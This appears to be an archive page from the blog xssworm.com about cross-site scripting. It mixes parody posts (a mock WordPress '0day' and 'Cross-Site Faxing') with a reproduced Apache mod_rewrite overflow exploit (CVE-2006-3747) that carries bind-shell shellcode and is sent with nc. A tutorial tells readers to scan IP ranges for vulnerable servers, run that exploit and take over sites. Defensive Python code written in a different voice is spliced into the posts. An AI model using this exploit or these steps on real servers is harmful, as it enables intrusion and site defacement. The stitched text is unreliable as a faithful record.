Archive for Cross Site Scripting

Cross Fax Scripting - New attack techniques use XSS and Fax Machines to Hack Victims

Dr Craig Wright has described a new attack vector known as Cross-Site Faxing (XSF) that abuses weaknesses in OCR 2.0 anti-phishing technology to bypass commercial anti-CSF appliances such as the i-XSS BloggerShield and UBsecure’s new XRCF Webfender 2.1.

On Nov 18, Dr Craig Wright (cwright@bdosyd.com.au) writes to pen-test:

“I have thought of an alternate path to loading a virus based on a network OCR’d fax server. In the scenario, we have to assume that the system is sending the output to a web front end or HTTP enabled email (not that uncommon).”

Dr Wright then illustrates the point with the following hypothetical scenario:

  • The system has no input filters and prints all characters to the email or web app.
  • The OCR engine is highly accurate and does not add spaces etc.
  • The email or web app displays exactly what it received.

Dr Craig Wright on Fax Site Scripting Attacks and Web 3.0:

“Now given that scenario, we have a possible XSS (cross-site-scripting) attack. If there are no filters for an outgoing connection (i.e. no firewall/proxy that strips scripts) and the client browser/email application allows access to the Internet, the attacker could create a script in the page that makes a call to an external system to download a file … a script could also embed a simple XOR obfuscation key to modify the downloaded code. On the web server it would be inert. When XOR’d with the key in the script (after being downloaded and installed), this will thus bypass the AV server (if there is one) and install the malware on the users system. […] Regards, Dr Craig Wright (GSE-Compliance)”

It is interesting to see this challenge considered by the security community. Are there currently any products we can purchase to scan incoming faxes? What about physical mail? A malicious attacker could embed scripting into an application form that is then printed and sent through snail mail to a recipient mail desk, which scans the mail and forwards it as a PDF or TIFF image to the unsuspecting victim.

This attack is very deadly as it takes advantage of embedded-object, macro or client-side exploits against PDF or TIFF viewers and their users. This is a very dangerous attack vector that must be explored, and all security consultants are encouraged to alert the wider community to the dangers of Cross-Site Faxing and Cross-Site Postage exploits.


0day inject Exploit for Wordpress 2.3 - xssworm.com - all versions vulnerable with no patch

0day XSS Exploit for Wordpress 2.3 – wp-slimstat 0.92 – [xssworm.com]

There is a serious hole in wordpress 2.3 that can be used with XSS by a blackhat hacker to attack the wordpress administrator and steal cookies from blogmins. This attack is known as 0day because it has just been reported to the public and this is the first day of the public vulnerability, and 0day means ‘published’.

Below is a demonstration attack against the wordpress install at http://xssworm.blogvis.com – please do not use it for your attack as we do not have a patch for this 0day exploit. The XSSWorm admin has been alerted and is looking for suspicious clicks (-;


Proof of concept:

http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=<xss shellcode>

This attack is to be used against the wordpress web blog blogmin to steal the blogosphere token and hack blogs. Of course we have included exploit code for this bug below.

We have looked at the code of wp-slimstat but we cannot see any problem with input validation. Maybe some of the xssworm.com readers can show us where the problem is in the php code, because we cannot see any problem here:

--snip--

C:\temp>findstr GET wp-slimstat.php
$myFilterField = intval( $_GET['ff'] );
$myFilterType = intval( $_GET['ft'] );
$myFilterString = $_GET['fi'];
$myFilterInterval = $_GET['fd'];
$myFilterField = intval( $_GET['ff'] );
$myFilterType = intval( $_GET['ft'] );
$myFilterString = $_GET['fi'];
$myFilterInterval = $_GET['fd'];
'.(!empty($myFilterString)?'— <a href="?page='.$_GET['page'].'&panel='.$_GET['panel'].'">'.__('Reset filters', 'wp-slimstat').'</a>':'').'
<input type="hidden" name="page" value="'.$_GET['page'].'" />
<input type="hidden" name="panel" value="'.$_GET['panel'].'" />
<input type="hidden" name="fd" value="'.$_GET['fd'].'" /></form>';

--snip--

With the programmer taking $_GET variables from the user and echoing them into the html output, maybe php's automatic GET validation filtering is not working for security? We are not php programmers so we cannot see any problems here, as the bug is too complex to understand.
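For readers who, unlike the post, do want the defect spelled out: in the snippet, ff and ft pass through intval() and can only ever become integers, while page, panel and fd are concatenated straight into HTML attribute values, so a double quote in any of them closes the attribute and the rest of the value is rendered as markup. The following Python is an added illustration, not wp-slimstat's code; it mimics the plugin's output shape (adding ff/ft fields so the contrast is visible) beside a hardened version that escapes every reflected string, as PHP's htmlspecialchars(..., ENT_QUOTES) or WordPress's esc_attr() would. The query string is constructed after the post's PoC URL, with a harmless probe in place of the shellcode placeholder.

```python
import html
from urllib.parse import parse_qs

# Constructed query string modelled on the PoC URL in the post; the "fd"
# value stands in for the <xss shellcode> placeholder (a harmless probe here).
QUERY = 'page=wp-slimstat/wp-slimstat.php&panel=1&fi=/feed/&ff=1&ft=2&fd=1"><i>probe</i>'

def intval(value):
    """Mimic PHP intval(): leading integer of the string, else 0. Never markup."""
    digits = ''
    for ch in value.strip():
        if ch.isdigit() or (ch == '-' and digits == ''):
            digits += ch
        else:
            break
    return int(digits) if digits not in ('', '-') else 0

def parse_query(qs):
    """First value of each parameter, like PHP's $_GET."""
    return {k: v[0] for k, v in parse_qs(qs, keep_blank_values=True).items()}

def hidden_fields_vulnerable(get):
    """Snippet's pattern: ff/ft go through intval(), page/panel/fd are echoed raw."""
    ff, ft = intval(get.get('ff', '')), intval(get.get('ft', ''))  # integers only
    return (f'<input type="hidden" name="ff" value="{ff}" />'
            f'<input type="hidden" name="ft" value="{ft}" />'
            f'<input type="hidden" name="page" value="{get.get("page", "")}" />'
            f'<input type="hidden" name="panel" value="{get.get("panel", "")}" />'
            f'<input type="hidden" name="fd" value="{get.get("fd", "")}" /></form>')

def hidden_fields_fixed(get):
    """Every string reflected into an attribute is attribute-escaped (quote=True
    escapes '"' as well as < > &), so the input cannot close the attribute."""
    esc = lambda name: html.escape(get.get(name, ''), quote=True)
    ff, ft = intval(get.get('ff', '')), intval(get.get('ft', ''))
    return (f'<input type="hidden" name="ff" value="{ff}" />'
            f'<input type="hidden" name="ft" value="{ft}" />'
            f'<input type="hidden" name="page" value="{esc("page")}" />'
            f'<input type="hidden" name="panel" value="{esc("panel")}" />'
            f'<input type="hidden" name="fd" value="{esc("fd")}" /></form>')

def reflected_unescaped(markup, probe='<i>probe</i>'):
    """True when the probe survives verbatim, i.e. the attribute was broken out of."""
    return probe in markup
```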

Exploit code in perl for whitehats is included here:

# Wordpress 2.3 0day exploit - http://xssworm.com
#
# A bug exists in wordpress 2.3 that allows a hacker to
# steal the blog cookie from the wordpress blogmin.
#
# To exploit the scripting bug the attacker makes a link
# to the URL of slimstat with XSS shellcode and forces the
# blog admin to hit the link by embedding it into a phishing
# email or making the blogmin follow interesting links.
# The hacker can also embed it into a referer or trackback
# to inject scripting into the wordpress dashboard or
# make the blogmin visit a malicious resource when viewing
# his blog.
#
#
# Status: not patched, published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj (vaj@xssworm.com)
#
# Instruction:
# To execute this exploit for wordpress you will need perl or linux
#
# Usage:
#
# Execute with perl or linux as:
# perl wordpress-2.3-0day-xss-injection-bug.pl
#
# The hacker will be prompted for target information.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#

#use Net::DNS::Simple;
#use Math;
use strict;
use warnings;
use Socket;

print "Welcome. What is the target email address of the wordpress blog admin : \n";
my $target = <STDIN>;
chomp($target);            # drop the newline so the address fits inside <...> below
print "ok target is $target\n";
sleep(3);
print "ok What is the address of the wordpress blog : \n";
sleep(5); my $address = <STDIN>;
chomp($address);
print "ok address is $address\n";
sleep(6);
# print "testing";
print "ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n";
print "\n\n -- CUT OUTPUT HERE -- \n\n";
print "HELO xssworm.com\n";
print "RSET\n";
print "MAIL FROM: <xssworm\@hotmail.com>\n";   # '@' must be escaped in a double-quoted string
print "RCPT TO: <$target>\n";
print "DATA\n"; print "Free x picture and movies at $address\n";
print "\r\n.\r\nquit\r\n";
print "\n\n -- END OF OUTPUT CUT HERE --\n";
print "";
print "Ok now you need to cut the exploit above and paste it to:\n";
print "$address : 25 \n";
print "Shellcode by vaj\@xssworm.com c. 2007\n";
print "End of attack.\n";
print "";
#print "Debug mode on";
#print "XSS initialized";
#payload
sleep(1); exit(0);    # return() is only valid inside a subroutine
# snips
#

Please note that this wp-slimstat does not contain any code injection or mysql injection bug vector that is open to blackhat attack via the transport of xss.

Many thanks for your comments on this vulnerability in wordpress 2.4

Thanks vaj


How to Hack Tutorials - Hacking and Defacing Web Sites with Exploits

Today we have a very special post of a hacking tutorial by the blackhat hacker Sunjester

But first you need to download the following hacking exploit:

http://www.milw0rm.com/exploits/2237
Ok so first we have step 1.

Code:

#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one.
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
#
# Thx to xuso for help me with the shellcode.
#
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
# you must recalculate adressess.
#
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
# for avoiding apache url-escape.. Take a look is quite nice ;)
#
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 for any other version/system find it.
#
# Gulcas rulez :P

echo -e "mod_rewrite apache off-by-one overflow"
echo    "by jack <jack\x40gulcas\x2eorg>\n\n"

if [ $# -ne 1 ] ; then
  echo "Usage: $0 webserver"
  exit
fi

host=$1

echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
Host: $host\r\n\r\n" | nc $host 80

# milw0rm.com [2006-08-21]
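The script above has a recognisable shape on the wire: the payload travels inside an ldap:// URL that the "kung/(.*)" RewriteRule hands to mod_rewrite's LDAP-URL escaping (where the CVE-2006-3747 off-by-one lives), preceded by 128 percent-encoded 0x90 NOP bytes and followed by shellcode that decodes to mostly non-ASCII bytes. The Python below is an added defender-side example, not part of the tutorial or the milw0rm entry: it classifies constructed Apache access-log lines by that shape. The sled threshold and the high-byte ratio are assumed cut-offs; a legitimate ldap:// rewrite target triggers neither.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed Common Log Format lines for illustration (not real traffic):
# a normal request, an exploit-shaped request, and a legitimate ldap:// rewrite.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Aug/2006:10:12:01 +0000] "GET /kung/index.html HTTP/1.1" 200 512',
    '10.0.0.7 - - [21/Aug/2006:10:12:03 +0000] "GET /kung/ldap://localhost/'
    + '%90' * 128 + '%89%e6%31%c0%31%db HTTP/1.1" 500 0',
    '10.0.0.9 - - [21/Aug/2006:10:12:09 +0000] "GET /kung/ldap://localhost/ou=people HTTP/1.1" 302 0',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d"')

def nop_sled_length(path):
    """Longest run of percent-encoded 0x90 (x86 NOP) bytes in the request path."""
    runs = re.findall(r'(?:%90)+', path, flags=re.IGNORECASE)
    return max((len(r) // 3 for r in runs), default=0)

def high_byte_ratio(path):
    """Share of decoded bytes >= 0x80: shellcode is mostly such bytes, URLs are not."""
    raw = unquote_to_bytes(path)
    return sum(b >= 0x80 for b in raw) / len(raw) if raw else 0.0

def classify(line, sled_threshold=32, ratio_threshold=0.3):
    """'ok', 'ldap-rewrite' (benign ldap:// target), 'suspect', or None if unparsable."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path = m.group('path')
    if 'ldap://' not in path.lower():
        return 'ok'
    if nop_sled_length(path) >= sled_threshold or high_byte_ratio(path) > ratio_threshold:
        return 'suspect'
    return 'ldap-rewrite'

def scan(lines):
    """Classify every line; callers alert on 'suspect' entries."""
    return [classify(line) for line in lines]
```

A successful overflow can kill the child process before the request is written to access_log, so pair this with watching error_log for segmentation-fault notices from Apache children.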

Sunjester says:

that code runs from a unix shell. so, get into your favorite shell. this tutorial is for those who have no idea what to do, with that in mind, let's continue.
If you are stuck already and don’t know where to get a shell, Sunjester recommends to you a backtrack attack:

if you are stuck already and don't know where to get or how to use a shell, i'm using a livecd, backtrack. let's do the first thing and GET the exploit.

Step 2: we have to download it from milw0rm. - http://milworm.com

Figure 1: Wget exploit downloading tutorial:

Step 2: Sunjester says to all elitehacker students:

now we have to edit the file since it downloaded with some html. if you try to run the file now it will error, it will say something like “Permission Denied”.

Example:

Sunjester says we need to change the file's permissions, because:

this aint windows this is a secure filesystem.

ok?

so let's chmod that badboy, might as well give it 777 since i'm root and it's just a livecd. the 777 permission gives read/write/execute to the user, the group, and the owner of the file.

as i said, since i'm root, and it's a friggin livecd, this will be fine.

you should never run scripts under root on your own box.

step 3:

now we can run the script, but we have to remove some stuff that wget put in there when we downloaded it, just some HTML. open up vi and start replacing the html. you should only have to delete the top line and replace the &quot; with double quotes.

Sunjester: once you're done you can save and quit vi or whatever editor you used and run it. it should come out something like below.

now that the script is working, let's look at some ways to find our target servers. we can use nmap and google. those are the two biggest ones i can think of and that i use myself.

you could target really any website, since we will scan a whole range of IP addresses. so type something like ::

Sunjester says to start there (festival.com) and scan away.
remember to save logs so it's easier to look through, you can just grep through your logs of the scans. below is an example of an nmap scan to gather information about what's on port 80. hopefully we can find some vulnerable ones in that range, if not, pick another hobby.

once you find one, we just run the exploit, let's check and see if the exploit worked…

*** Note to readers: Unfortunately Sunjester has not included all of the screenshots of hacking into FESTIVAL.COM ***

And now we move on to the final part of hacking:

Step 5:

Sunjester says: ” sweet, netcat your way in :P this should be the end of the road. if you are still having problems running this small script, seek help. you need help. “

With special thanks to http://elitehackers.info/?pwnd=true


Video: Hacker expert says Metacafe can be hacked with XSS Worm

The hacker PsychoGun has discovered many security vulnerabilities in the popular video site Metacafe, including new serious XSS exploits.

Vulnerabilities are security holes used by hackers to hack websites or their users. When we search for the keyword hacking on Metacafe, we can see many hacking videos.

“I do not understand why videos which speak about hacking metacafe vulnerabilities can be rejected, whereas many videos of hacking Windows are rewarded,” says the hacker PsychoGun. “Does Somebody Have An Answer?”

Visitors, please comment if you have knowledge of hacking metacafe videos or if you have seen these tricks before.

If you are new to XSS Hacking you must view our special How To Hack blogs and leave comments.

Thank you


Video Tutorial: Cross Site Scripting (XSS) Attacks and How to Write Exploits

Video : Exploit Tutorial : Cross Site Scripting (XSS) and How to Write Exploits - http://xssworm.com

Threat Level: 1-2 out of 5

Description: A vulnerable website page does not filter its input correctly, which can open a security hole for blackhat hackers in Cross Site Scripting (CSS) Attacks. This video demonstrates how to attack any vulnerable server using an XSS Scripting attack.

Watch video of hacking tutorials and demonstrations of XSS attacks - visit our XSS Hacking Video site


XSS WORM Cross Site Scripting Attacks (XSS) Information Portal 2.0

We are proud to announce the grand-opening of XSS Worm : Cross Site Scripting Attacks ™ - http://www.XSSworm.com - Cross Site Scripting Attacks : the new site for discussion of XSS (also known as CSS (not to be confused with Cascading Style Sheets (also sometimes referred to as CSS)) vulnerabilities) security issues in web-enabled networks and dynamic Internet applications.

XSS - a word commonly used by modern security experts to categorize a wide range of emerging web-enabled security threats. This unpronounceable word was once said to derive from the common term “Cross Site Scripting” (the leading X in this instance perhaps alluding to the Cross of the popular novel.) Yes friends, our Web sites are becoming more complicated from day to day, and the number of web sites produced in plain html is decreasing on the net. The popular technologies are php, asp, jsp and others, and with this increase the attacks are becoming more dangerous.

It’s very common and unfortunately still an issue we have to deal with in many web-aware applications. Internally the XSS WORM Team has been working on several XSS Security projects to help mitigate and fix these security issues, as well as to detect them in the code sources that are available online so that they can be fixed before a worm is developed.


Go straight to the XSS Security discussion forum!

According to a new study, up to over 90% of all (100%) web sites may be vulnerable to some form of security attack.

Prominent Jeremiah Grossman of WhiteHat Security (whitehat.com), the Web application security firm founded by vulnerability-scanning whiz Jeremiah Grossman, concludes that as many as 90 percent of all the sites that it has tested in the last year remain open to some form of hijack or infection.

The leading problem remains many sites’ vulnerability to cross-site scripting (XSS) hacks, through which attackers place malicious code on legitimate sites to trick end users into handing over their personal information or passwords.

As many as 75 percent of the pages scanned by WhiteHat had some form of XSS-exploitable flaw, according to the paper. But it’s not only XSS Worms that application developers have to be concerned about - according to WhiteHat, Cross-Site Request Forgery attacks are emerging as the “new .. [xss] ” and hackers are scrambling to update their virus engines.

“The best way to think about Response Splitting is that it’s executed similarly to Cross-Site Scripting (XSS) … but more powerful.”
Jeremiah Grossman

As in the rest of the online world, however, WhiteHat contends that XSS threats top the list of vulnerability classes by vertical, followed closely by Information Leakage.

“These statistics continue to reveal recurring and emerging issues that are affecting Web sites across industries,” said Grossman, who wears the title of CTO at WhiteHat. “As increasing amounts of sensitive data are stored online, WhiteHat remains vigilant about alerting companies to common attack methods and emphasizing the importance of Web site vulnerability management as part of their overall security posture.”

The original security article source can be located at http://weblog.infoworld.com/zeroday/archives/2007/10/study_90_percen.html or at http://google.com.

This is our introduction for the newest premium security information service XSSworm.com : cross-site scripting attacks - we will be posting news and updates on these topics and we welcome all of your comments on the topics of Web 2.0 Security, Cross-Site Scripting, XSS Worms, XSRF Worms, Digg and Social Networking worms, Youtube worms, Facebook worms, Web 2.0 Security and XML and so much more!

Looking for XSS Vulnerabilities and Exploits?

WHITEHATS — Please pay our XSS page a visit and leave your comments! - only the most relevant XSS security news, tools and comments - no spam please, your blackhat SEO tricks are not welcome here.

Regards, The XSS Worm . Com Team.

XSS WORM : Cross Site Scripting Attacks : http://www.xssworm.com - cross-site-scripting-security@xssworm.com - AIM: cross site XSS - (c) 2007,2008
